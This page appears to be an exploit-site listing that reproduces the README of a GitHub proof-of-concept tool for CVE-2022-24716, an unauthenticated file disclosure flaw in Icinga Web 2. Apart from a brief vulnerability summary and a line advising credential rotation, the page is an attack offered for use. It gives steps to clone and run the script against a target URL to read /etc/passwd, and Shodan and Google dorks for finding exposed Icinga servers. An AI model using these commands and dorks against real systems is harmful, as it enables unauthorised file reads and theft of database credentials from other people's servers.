Share
## https://sploitus.com/exploit?id=DD9B7094-3DD7-5635-853A-864D9C144E1F
# CVE-2022-24716

Arbitrary File Disclosure Vulnerability in Icinga Web 2 <2.8.6, <2.9.6, <2.10

Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.


## Clone & Usage

1. git clone https://github.com/doosec101/CVE-2022-24716.git
2. cd CVE-2022-24716
3. pip3 install -r requirements.txt
4. python3 CVE-2022-24716.py -u https://example.com -p /etc/passwd

#### Note:-

Recommend to put the path to /etc/passwd , So the script let you know if the given url is vulnerable or not

#### Dorks:-

- Shodan: http.title:"Icinga" , https://www.shodan.io/search?query=%22Icinga%22
- Google: intitle:"Icinga"

## POC:-

https://user-images.githubusercontent.com/128431701/227827785-938f038b-6d17-4a5d-81d9-8399a4b1ccd3.mp4